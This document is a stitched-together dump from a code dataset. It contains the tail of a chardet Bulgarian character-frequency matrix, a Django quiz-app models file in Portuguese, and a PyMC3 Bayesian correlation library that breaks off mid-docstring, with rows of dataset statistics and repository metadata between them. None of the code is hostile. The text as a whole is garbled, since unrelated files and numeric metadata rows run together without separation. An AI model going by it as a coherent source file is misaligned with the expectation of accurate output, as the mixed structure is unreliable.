2,3,3,3,3,2,2,1,0,1,0,0,1,0,0,0,2,1,0,3,0,0,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,2,3,2,3,3,1,3,2,1,1,1,2,1,1,2,1,3,0,1,0,0,0,1,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,1,2,2,3,3,2,3,2,2,2,3,1,2,2,1,1,2,1,1,2,2,0,1,1,0,1,0,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,3,1,0,2,2,1,3,2,1,0,0,2,0,2,0,1,0,0,0,0,0,0,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,3,1,2,0,2,3,1,2,3,2,0,1,3,1,2,1,1,1,0,0,1,0,0,2,2,2,3,
2,2,2,2,1,2,1,1,2,2,1,1,2,0,1,1,1,0,0,1,1,0,0,1,1,0,0,0,1,1,0,1,
3,3,3,3,3,2,1,2,2,1,2,0,2,0,1,0,1,2,1,2,1,1,0,0,0,1,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,
3,3,2,3,3,1,1,3,1,0,3,2,1,0,0,0,1,2,0,2,0,1,0,0,0,1,0,1,2,1,2,2,
1,1,1,1,1,1,1,2,2,2,1,1,1,1,1,1,1,0,1,2,1,1,1,0,0,0,0,0,1,1,0,0,
3,1,0,1,0,2,3,2,2,2,3,2,2,2,2,2,1,0,2,1,2,1,1,1,0,1,2,1,2,2,2,1,
1,1,2,2,2,2,1,2,1,1,0,1,2,1,2,2,2,1,1,1,0,1,1,1,1,2,0,1,0,0,0,0,
2,3,2,3,3,0,0,2,1,0,2,1,0,0,0,0,2,3,0,2,0,0,0,0,0,1,0,0,2,0,1,2,
2,1,2,1,2,2,1,1,1,2,1,1,1,0,1,2,2,1,1,1,1,1,0,1,1,1,0,0,1,2,0,0,
3,3,2,2,3,0,2,3,1,1,2,0,0,0,1,0,0,2,0,2,0,0,0,1,0,1,0,1,2,0,2,2,
1,1,1,1,2,1,0,1,2,2,2,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,
2,3,2,3,3,0,0,3,0,1,1,0,1,0,0,0,2,2,1,2,0,0,0,0,0,0,0,0,2,0,1,2,
2,2,1,1,1,1,1,2,2,2,1,0,2,0,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,
3,3,3,3,2,2,2,2,2,0,2,1,1,1,1,2,1,2,1,1,0,2,0,1,0,1,0,0,2,0,1,2,
1,1,1,1,1,1,1,2,2,1,1,0,2,0,1,0,2,0,0,1,1,1,0,0,2,0,0,0,1,1,0,0,
2,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,0,0,0,1,2,0,1,2,
2,2,2,1,1,2,1,1,2,2,2,1,2,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,0,
2,3,3,3,3,0,2,2,0,2,1,0,0,0,1,1,1,2,0,2,0,0,0,3,0,0,0,0,2,0,2,2,
1,1,1,2,1,2,1,1,2,2,2,1,2,0,1,1,1,0,1,1,1,1,0,2,1,0,0,0,1,1,0,0,
2,3,3,3,3,0,2,1,0,0,2,0,0,0,0,0,1,2,0,2,0,0,0,0,0,0,0,0,2,0,1,2,
1,1,1,2,1,1,1,1,2,2,2,0,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,
3,3,2,2,3,0,1,0,1,0,0,0,0,0,0,0,1,1,0,3,0,0,0,0,0,0,0,0,1,0,2,2,
1,1,1,1,1,2,1,1,2,2,1,2,2,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,0,0,
3,1,0,1,0,2,2,2,2,3,2,1,1,1,2,3,0,0,1,0,2,1,1,0,1,1,1,1,2,1,1,1,
1,2,2,1,2,1,2,2,1,1,0,1,2,1,2,2,1,1,1,0,0,1,1,1,2,1,0,1,0,0,0,0,
2,1,0,1,0,3,1,2,2,2,2,1,2,2,1,1,1,0,2,1,2,2,1,1,2,1,1,0,2,1,1,1,
1,2,2,2,2,2,2,2,1,2,0,1,1,0,2,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,0,0,
2,1,1,1,1,2,2,2,2,1,2,2,2,1,2,2,1,1,2,1,2,3,2,2,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,3,2,0,1,2,0,1,2,1,1,0,1,0,1,2,1,2,0,0,0,1,1,0,0,0,1,0,0,2,
1,1,0,0,1,1,0,1,1,1,1,0,2,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,
2,0,0,0,0,1,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,2,1,1,1,
1,2,2,2,2,1,1,2,1,2,1,1,1,0,2,1,2,1,1,1,0,2,1,1,1,1,0,1,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,
1,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,3,2,0,0,0,0,1,0,0,0,0,0,0,1,1,0,2,0,0,0,0,0,0,0,0,1,0,1,2,
1,1,1,1,1,1,0,0,2,2,2,2,2,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,1,
2,3,1,2,1,0,1,1,0,2,2,2,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,2,
1,1,1,1,2,1,1,1,1,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,
2,2,2,2,2,0,0,2,0,0,2,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,0,2,2,
1,1,1,1,1,0,0,1,2,1,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,2,0,1,1,0,0,0,1,0,0,2,0,2,0,0,0,0,0,0,0,0,0,0,1,1,
0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,3,2,0,0,1,0,0,1,0,0,0,0,0,0,1,0,2,0,0,0,1,0,0,0,0,0,0,0,2,
1,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,1,2,2,2,1,2,1,2,2,1,1,2,1,1,1,0,1,1,1,1,2,0,1,0,1,1,1,1,0,1,1,
1,1,2,1,1,1,1,1,1,0,0,1,2,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,
1,0,0,1,3,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,1,0,0,1,0,2,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,0,2,0,0,1,
0,2,0,1,0,0,1,1,2,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,1,1,0,2,1,0,1,1,1,0,0,1,0,2,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,2,0,0,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,
0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,1,2,1,1,1,1,1,1,2,2,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,0,
1,1,2,1,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,1,2,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,
1,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,0,2,0,0,2,0,1,0,0,1,0,0,1,
1,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,
1,1,1,1,1,1,1,2,0,0,0,0,0,0,2,1,0,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
)
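# Illustrative sketch (assuming the usual chardet layout of a flattened 64x64
# precedence matrix): the likelihood class of two consecutive frequent letters
# is read as BulgarianLangModel[prev_order * 64 + cur_order], where 3 marks a
# very common pair and 0 an essentially unseen (negative) one.
def _example_sequence_class(prev_order, cur_order):
    return BulgarianLangModel[prev_order * 64 + cur_order]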
Latin5BulgarianModel = {
'char_to_order_map': Latin5_BulgarianCharToOrderMap,
'precedence_matrix': BulgarianLangModel,
'typical_positive_ratio': 0.969392,
'keep_english_letter': False,
'charset_name': "ISO-8859-5",
  'language': 'Bulgarian',
}
Win1251BulgarianModel = {
'char_to_order_map': win1251BulgarianCharToOrderMap,
'precedence_matrix': BulgarianLangModel,
'typical_positive_ratio': 0.969392,
'keep_english_letter': False,
'charset_name': "windows-1251",
'language': 'Bulgarian',
}
| 55.640351 | 70 | 0.550607 | 4,905 | 12,686 | 1.41998 | 0.071356 | 0.476382 | 0.596123 | 0.693754 | 0.777172 | 0.762958 | 0.742426 | 0.709978 | 0.669634 | 0.624264 | 0 | 0.469257 | 0.062825 | 12,686 | 227 | 71 | 55.885463 | 0.116578 | 0.110358 | 0 | 0.258242 | 0 | 0 | 0.020685 | 0.003957 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ace322f083367b4037c377c96ba682918d3d26ac | 3,573 | py | Python | app_quis/models.py | naelallves/proj_sinal_transito | bc8b82c1809b8ff97996227bbefc07f42ea5f736 | [
"MIT"
] | null | null | null | app_quis/models.py | naelallves/proj_sinal_transito | bc8b82c1809b8ff97996227bbefc07f42ea5f736 | [
"MIT"
] | null | null | null | app_quis/models.py | naelallves/proj_sinal_transito | bc8b82c1809b8ff97996227bbefc07f42ea5f736 | [
"MIT"
] | null | null | null | from itertools import chain
from django.db import models
class Categoria(models.Model):
nome = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)
updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)
class Meta:
verbose_name_plural = 'Categorias'
    def to_dict(self):
        opts = self._meta
        data = {}
        for f in chain(opts.concrete_fields, opts.private_fields):
            data[f.name] = f.value_from_object(self)
        for f in opts.many_to_many:
            data[f.name] = [i.id for i in f.value_from_object(self)]
        return data
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return self.__repr__()
class Pergunta(models.Model):
id_categoria = models.ForeignKey(Categoria, on_delete=models.CASCADE, blank=True, null=True)
código = models.CharField(max_length=50, blank=True, null=True)
enunciado = models.TextField(blank=True, null=False)
created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)
updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)
    def getAlternativas(self):
        #the default manager is not reachable from an instance; follow the
        #reverse FK from RelPerguntaAlternativa back to this question instead
        rels = self.relperguntaalternativa_set.select_related('id_alternativa')
        return [rel.id_alternativa for rel in rels]
    def to_dict(self):
        opts = self._meta
        data = {}
        for f in chain(opts.concrete_fields, opts.private_fields):
            data[f.name] = f.value_from_object(self)
        for f in opts.many_to_many:
            data[f.name] = [i.id for i in f.value_from_object(self)]
        return data
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return self.__repr__()
class Meta:
verbose_name_plural = 'Perguntas'
class Alternativa(models.Model):
conteudo = models.TextField(blank=True, null=False)
created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)
updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)
class Meta:
verbose_name_plural = 'Alternativas'
    def to_dict(self):
        opts = self._meta
        data = {}
        for f in chain(opts.concrete_fields, opts.private_fields):
            data[f.name] = f.value_from_object(self)
        for f in opts.many_to_many:
            data[f.name] = [i.id for i in f.value_from_object(self)]
        return data
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return self.__repr__()
class RelPerguntaAlternativa(models.Model):
id_pergunta = models.ForeignKey(Pergunta, on_delete=models.CASCADE)
id_alternativa = models.ForeignKey(Alternativa, on_delete=models.CASCADE)
certa = models.BooleanField(default=False)
    def to_dict(self):
        opts = self._meta
        data = {}
        for f in chain(opts.concrete_fields, opts.private_fields):
            data[f.name] = f.value_from_object(self)
        for f in opts.many_to_many:
            data[f.name] = [i.id for i in f.value_from_object(self)]
        return data
def __repr__(self):
return str(self.to_dict())
def __str__(self):
return self.__repr__()
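# Illustrative usage sketch (assumes a configured Django environment and
# applied migrations; the example data below are hypothetical, not part of
# the app):
#
#   categoria = Categoria.objects.create(nome="Sinais de transito")
#   pergunta = Pergunta.objects.create(id_categoria=categoria,
#                                      enunciado="O que significa o sinal vermelho?")
#   certa = Alternativa.objects.create(conteudo="Pare")
#   errada = Alternativa.objects.create(conteudo="Siga")
#   RelPerguntaAlternativa.objects.create(id_pergunta=pergunta,
#                                         id_alternativa=certa, certa=True)
#   RelPerguntaAlternativa.objects.create(id_pergunta=pergunta,
#                                         id_alternativa=errada)
#   pergunta.getAlternativas()  # -> the two Alternativa instances above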
# class RelAlternativaCategoria(models.Model):
# id_alternativa = models.ForeignKey(Alternativa, on_delete=models.CASCADE)
# id_categoria = models.ForeignKey(Categoria, on_delete=models.CASCADE)
# certa = models.BooleanField(default=False) | 40.146067 | 96 | 0.679261 | 469 | 3,573 | 4.908316 | 0.157783 | 0.034752 | 0.041703 | 0.055604 | 0.79192 | 0.773675 | 0.773675 | 0.773675 | 0.773675 | 0.640747 | 0 | 0.001788 | 0.217464 | 3,573 | 89 | 97 | 40.146067 | 0.821531 | 0.06829 | 0 | 0.730769 | 0 | 0 | 0.009323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.025641 | 0.102564 | 0.628205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
c587b49abf349b62155b61a1cbfe3f0c05c23363 | 29,562 | py | Python | pybaycor/pybaycor.py | pscicluna/pybaycor | dd76f46eb50af4812224d9f7e782942d0da6f5e0 | [
"MIT"
] | 8 | 2021-03-24T11:21:43.000Z | 2022-02-23T08:03:39.000Z | pybaycor/pybaycor.py | pscicluna/pybaycor | dd76f46eb50af4812224d9f7e782942d0da6f5e0 | [
"MIT"
] | 6 | 2021-03-20T04:20:50.000Z | 2021-03-24T07:57:58.000Z | pybaycor/pybaycor.py | pscicluna/pybaycor | dd76f46eb50af4812224d9f7e782942d0da6f5e0 | [
"MIT"
] | null | null | null | import numpy as np
import pymc3 as pm
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
import matplotlib.gridspec as gs
import arviz as az
import xarray as xr
class BayesianCorrelation():
""" A class to infer Bayesian correlation coefficients for multidimensional data without uncertainties
Parameters
----------
data : float, (n_points, n_dim) array_like
The multidimensional dataset to infer correlations on.
Either data OR both x & y should be passed as input.
x : float, (n_points) array_like
Array_like of x values (optional; only for 2-D datasets)
    y : float, (n_points) array_like
Array_like of y values (optional; only for 2-D datasets)
ndim : int, optional
The number of dimensions in the input data.
If not given, it will be inferred from the data
mu_prior : length-2 or (2, ndim) iterable of floats, optional, default (0., 1000.)
The mean and standard deviation of the Gaussian prior on the multivariate Normal distribution
sigma_prior : scalar or (ndim) iterable of floats, optional, default 200.
The prior on the scale parameter (beta) of the half-Cauchy prior on the standard deviations of the multivariate Normal distribution
Attributes
----------
None
Methods
--------
fit : Fit the data assuming they are drawn from a multivariate Normal distribution
summarise : summarise the results of the fit
plot_trace : plot the trace and marginal distributions of the trace
plot_data : plot the data overlaid with the ellipse described by the inferred correlated multivariate Normal
plot_corner : plot the 1D and 2D marginal distributions of the inferred parameters.
Examples
--------
Creating an instance is as simple as
>>> import pybaycor as pbc
>>> bc = pbc.BayesianCorrelation(data=data)
Once you have created the instances, the fit is run with
>>> bc.fit()
or you can modify the length of burn-in and number of steps with
>>> bc.fit(steps=2000, tune=2000)
Once you are happy with the fit, you can get a tabular summary with
>>> summary = bc.summarise()
and visual summaries with
>>> bc.plot_trace()
>>> bc.plot_corner()
    >>> bc.plot_data()
"""
def __init__(self,data=None, x=None, y=None, ndim = None, mu_prior=[0.0,1000.], sigma_prior=200.):
#if ndim is None:
self.fitted=False
self.plot_trace_vars = ['mu', "chol_corr"]
if data is None:
if x is None and y is None:
raise ValueError("Either data must be given as input, or x and y")
else:
self.ndim = 2
self.data = np.column_stack((x,y))
else:
if ndim is None:
self.ndim = data.shape[1]
else:
self.ndim = ndim
if self.ndim != data.shape[1]:
raise ValueError("Data must have the same number of features and ndim")
self.data = data
self.model = pm.Model()
with self.model:
#we put weakly informative priors on the means and standard deviations of the multivariate normal distribution
mu = pm.Normal("mu", mu=mu_prior[0], sigma=mu_prior[1], shape=self.ndim)
sigma = pm.HalfCauchy.dist(sigma_prior)
#and a prior on the covariance matrix which weakly penalises strong correlations
chol, corr, stds = pm.LKJCholeskyCov("chol", n=self.ndim, eta=2.0, sd_dist=sigma, compute_corr=True)
#the prior gives us the Cholesky Decomposition of the covariance matrix, so for completeness we can calculate that determinisitically
cov = pm.Deterministic("cov", chol.dot(chol.T))
#and now we can put our observed values into a multivariate normal to complete the model
vals = pm.MvNormal('vals', mu=mu, chol=chol, observed=self.data)
pass
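        # The generative model assembled above, written out as a sketch of
        # what the PyMC3 graph encodes (with the default priors):
        #   mu_k   ~ Normal(0, 1000)                        k = 1..ndim
        #   L      ~ LKJCholeskyCov(eta=2, sd_dist=HalfCauchy(200))
        #   Sigma  = L L^T
        #   x_i    ~ MvNormal(mu, Sigma)                    for each observation i
        # The reported correlations (chol_corr) are the off-diagonal entries
        # of the correlation matrix implied by Sigma.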
def fit(self,steps=1000, tune=1000, summarise=False):
""" Fit the model to infer the correlation coefficient
Parameters
----------
steps : int, optional, default 1000
Number of MCMC steps per chain after burn-in
tune : int, optional, default 1000
Number of steps per chain for burn-in
summarise : bool, default False
Whether to produce the table summary (also available through summarise())
"""
with self.model:
self.trace = pm.sample(
steps, tune=tune, target_accept=0.9, compute_convergence_checks=False,return_inferencedata=True
)
self.fitted=True
if summarise:
self.summary = az.summary(self.trace, var_names=["~chol"], round_to=2)
#self.rho = [self.summary['hdi_3%'][chol_corr[1,0]],self.summary['mean'][chol_corr[1,0]],self.summary['hdi_97%'][chol_corr[1,0]]]
print(self.summary)
return self.trace, self.summary
return self.trace
def summarise(self):
""" Summarise the results of the model
Parameters
----------
None
"""
self.summary = az.summary(self.trace, var_names=["~chol"], round_to=2)
print(self.summary)
return self.summary
def plot_trace(self,plotfile=None, show=False):
""" Plot the trace of the MCMC run along with the marginal distributions of a subset of parameters
Parameters
----------
plotfile : str, optional
Name of a file to write the plot to
show : bool, optional, default False
Whether to show the plot window
"""
if not self.fitted:
            raise RuntimeError("Please run fit() before attempting to plot the results")
ax = az.plot_trace(
self.trace,
var_names=self.plot_trace_vars,
#filter_vars="regex",
compact=True,
#lines=[
#("mu", {}, mu),
#("cov", {}, cov),
#("chol_stds", {}, sigma),
#("chol_corr", {}, rho),
#],
)
if isinstance(plotfile, str):
            plt.savefig(plotfile)
if show:
plt.show()
#elif plotfile is not None:
# plt.close()
#should this also return the ax?
def plot_data(self,plotfile=None, show=None):
""" Plot the input data overlaid with the ellipse described by the inferred correlated multivariate distribution
Parameters
----------
plotfile : str, optional
Name of a file to write the plot to
show : bool, optional, default False
Whether to show the plot window
"""
#Currently only supports 2D correlations
#if self.ndim != 2:
# raise NotImplementedError("This routine doesn't support plotting correlations in more than 2 dimensions yet!")
if not self.fitted:
raise RuntimeError("Please run fit() before attempting to plot the results")
        if self.ndim == 2:
blue, _, red, *_ = sns.color_palette()
f, ax = plt.subplots(1, 1, figsize=(5, 4))#, gridspec_kw=dict(width_ratios=[4, 3]))
sns.scatterplot(x=self.data[:,0], y=self.data[:,1])
mu_post = self.trace.posterior["mu"].mean(axis=(0, 1)).data
sigma_post = self.trace.posterior["cov"].mean(axis=(0, 1)).data
var_post, U_post = np.linalg.eig(sigma_post)
angle_post = 180.0 / np.pi * np.arccos(np.abs(U_post[0, 0]))
e_post = Ellipse(
mu_post,
2 * np.sqrt(5.991 * var_post[0]),
2 * np.sqrt(5.991 * var_post[1]),
angle=angle_post,
)
e_post.set_alpha(0.5)
e_post.set_facecolor(blue)
e_post.set_zorder(10)
ax.add_artist(e_post)
rect_post = plt.Rectangle((0, 0), 1, 1, fc=blue, alpha=0.5)
ax.legend(
[rect_post],
["Estimated 95% density region"],
loc=2,
)
#plt.show()
        elif self.ndim > 2:
            blue, _, red, *_ = sns.color_palette()
            rows = self.ndim - 1
            cols = self.ndim - 1
            fig = plt.figure()
            grid = fig.add_gridspec(rows, cols, left=0.1, right=0.9, bottom=0.1, top=0.9,
                                    wspace=0.05, hspace=0.05)
            mu_full = self.trace.posterior["mu"].mean(axis=(0, 1)).data
            cov_full = self.trace.posterior["cov"].mean(axis=(0, 1)).data
            for i in range(self.ndim - 1):
                for j in range(i + 1, self.ndim):
                    ax = fig.add_subplot(grid[i, j - 1])
                    #plot the data points
                    sns.scatterplot(x=self.data[:, i], y=self.data[:, j], ax=ax)
                    #marginalise the posterior mean and covariance down to dimensions (i, j)
                    mu_post = mu_full[[i, j]]
                    sigma_post = cov_full[np.ix_([i, j], [i, j])]
                    var_post, U_post = np.linalg.eig(sigma_post)
                    angle_post = 180.0 / np.pi * np.arccos(np.abs(U_post[0, 0]))
                    e_post = Ellipse(
                        mu_post,
                        2 * np.sqrt(5.991 * var_post[0]),
                        2 * np.sqrt(5.991 * var_post[1]),
                        angle=angle_post,
                    )
                    e_post.set_alpha(0.5)
                    e_post.set_facecolor(blue)
                    e_post.set_zorder(10)
                    ax.add_artist(e_post)
        else:
            raise ValueError("ndim must be an integer of at least 2!")
        if isinstance(plotfile, str):
            plt.savefig(plotfile)
        elif plotfile is not None:
            raise TypeError("plotfile must be a string")
        if show:
            plt.show()
#elif plotfile is not None:
# plt.close()
def plot_corner(self, point_estimate='mean',plotfile=None,show=True):
""" Plot the 1D and 2D marginal distributions of the inferred parameters
Parameters
----------
plotfile : str, optional
Name of a file to write the plot to
show : bool, optional, default False
Whether to show the plot window
"""
#For consistency's sake I'm going to re-invent the wheel here, and manually create a grid of plots from arviz, rather than letting corner do the work. This is because I want to make sure specific entries are plotted in a specific order.
        plot_vars = self.plot_trace_vars
        if self.ndim == 2:
            #for 2-d data there is a single off-diagonal correlation entry
            coords = {"chol_corr_dim_0": [0], "chol_corr_dim_1": [1]}
        else:
            #select every upper-triangular (i, j) pair of the correlation matrix
            d0 = []
            d1 = []
            for i in range(self.ndim - 1):
                for j in range(i + 1, self.ndim):
                    d0.append(i)
                    d1.append(j)
            coords = {"chol_corr_dim_0": xr.DataArray(d0, dims=['pointwise_sel']),
                      "chol_corr_dim_1": xr.DataArray(d1, dims=['pointwise_sel'])}
az.plot_pair(self.trace,
var_names = plot_vars,
coords = coords,
kind="kde",
marginals=True,
point_estimate=point_estimate,
show=show,
)
        if isinstance(plotfile, str) and not show:
            plt.savefig(plotfile)
        elif plotfile is not None and not show:
            raise TypeError("plotfile must be a string")
#pass
class RobustBayesianCorrelation(BayesianCorrelation):
""" A class to infer robust Bayesian correlation coefficients for multidimensional data without uncertainties
Parameters
----------
data : float, (n_points, n_dim) array_like
The multidimensional dataset to infer correlations on.
Either data OR both x & y should be passed as input.
x : float, (n_points) array_like
Array_like of x values (optional; only for 2-D datasets)
    y : float, (n_points) array_like
Array_like of y values (optional; only for 2-D datasets)
ndim : int, optional
The number of dimensions in the input data.
If not given, it will be inferred from the data
mu_prior : length-2 or (2, ndim) iterable of floats, optional, default (0., 1000.)
The mean and standard deviation of the Gaussian prior on the multivariate t distribution
sigma_prior : scalar or (ndim) iterable of floats, optional, default 200.
The prior on the scale parameter (beta) of the half-Cauchy prior on the standard deviations of the multivariate t distribution
Attributes
----------
None
Methods
--------
    fit : Fit the data assuming they are drawn from a multivariate Student-t distribution
summarise : summarise the results of the fit
plot_trace : plot the trace and marginal distributions of the trace
plot_data : plot the data overlaid with the ellipse described by the inferred correlated multivariate Normal
plot_corner : plot the 1D and 2D marginal distributions of the inferred parameters.
Examples
--------
Creating an instance is as simple as
>>> import pybaycor as pbc
    >>> bc = pbc.RobustBayesianCorrelation(data=data)
Once you have created the instances, the fit is run with
>>> bc.fit()
or you can modify the length of burn-in and number of steps with
>>> bc.fit(steps=2000, tune=2000)
Once you are happy with the fit, you can get a tabular summary with
>>> summary = bc.summarise()
and visual summaries with
>>> bc.plot_trace()
>>> bc.plot_corner()
    >>> bc.plot_data()
"""
def __init__(self,data=None, x=None, y=None, ndim = None, mu_prior=[0.0,1000.], sigma_prior=200.):
#if ndim is None:
self.fitted=False
self.plot_trace_vars = ['mu', "nu", "chol_corr"] #, "~nu-1", "~cov", "~chol_stds", "~chol"]
if data is None:
if x is None and y is None:
raise ValueError("Either data must be given as input, or x and y")
else:
self.ndim = 2
self.data = np.column_stack((x,y))
else:
if ndim is None:
self.ndim = data.shape[1]
else:
self.ndim = ndim
if self.ndim != data.shape[1]:
raise ValueError("Data must have the same number of features and ndim")
self.data = data
self.model = pm.Model()
with self.model:
#we put weakly informative priors on the means and standard deviations of the multivariate normal distribution
mu = pm.Normal("mu", mu=mu_prior[0], sigma=mu_prior[1], shape=self.ndim)
sigma = pm.HalfCauchy.dist(sigma_prior)
#and a prior on the covariance matrix which weakly penalises strong correlations
chol, corr, stds = pm.LKJCholeskyCov("chol", n=self.ndim, eta=2.0, sd_dist=sigma, compute_corr=True)
#the prior gives us the Cholesky Decomposition of the covariance matrix, so for completeness we can calculate that determinisitically
cov = pm.Deterministic("cov", chol.dot(chol.T))
nuMinusOne = pm.Exponential('nu-1', lam=1./29.)
nu = pm.Deterministic('nu', nuMinusOne + 1)
#and now we can put our observed values into a multivariate t distribution to complete the model
vals = pm.MvStudentT('vals', nu = nu, mu=mu, chol=chol, observed=self.data)
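            # A sketch of the only change relative to the plain model: a
            # heavy-tailed Student-t likelihood whose degrees of freedom are
            # themselves inferred,
            #   nu - 1 ~ Exponential(1/29)   (prior mean nu = 30, i.e. near-Gaussian)
            #   x_i    ~ MvStudentT(nu, mu, Sigma)
            # A small inferred nu fattens the tails and downweights outliers,
            # which is what makes this estimator robust.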
class HierarchicalBayesianCorrelation(BayesianCorrelation):
"""A class to infer Bayesian correlation coefficients for uncertain multidimensional data
Parameters
----------
data : float, (n_points, n_dim) array_like
The multidimensional dataset to infer correlations on.
sigma : float, (n_points, n_dim) array_like
The uncertainties of the multidimensional dataset to infer correlations on.
mu_prior : length-2 or (2, ndim) iterable of floats, optional, default (0., 1000.)
The mean and standard deviation of the Gaussian prior on the multivariate Normal distribution
sigma_prior : scalar or (ndim) iterable of floats, optional, default 200.
The prior on the scale parameter (beta) of the half-Cauchy prior on the standard deviations of the multivariate Normal distribution
Attributes
----------
None
Methods
--------
fit : Fit the data assuming they are drawn from a multivariate Normal distribution
summarise : summarise the results of the fit
plot_trace : plot the trace and marginal distributions of the trace
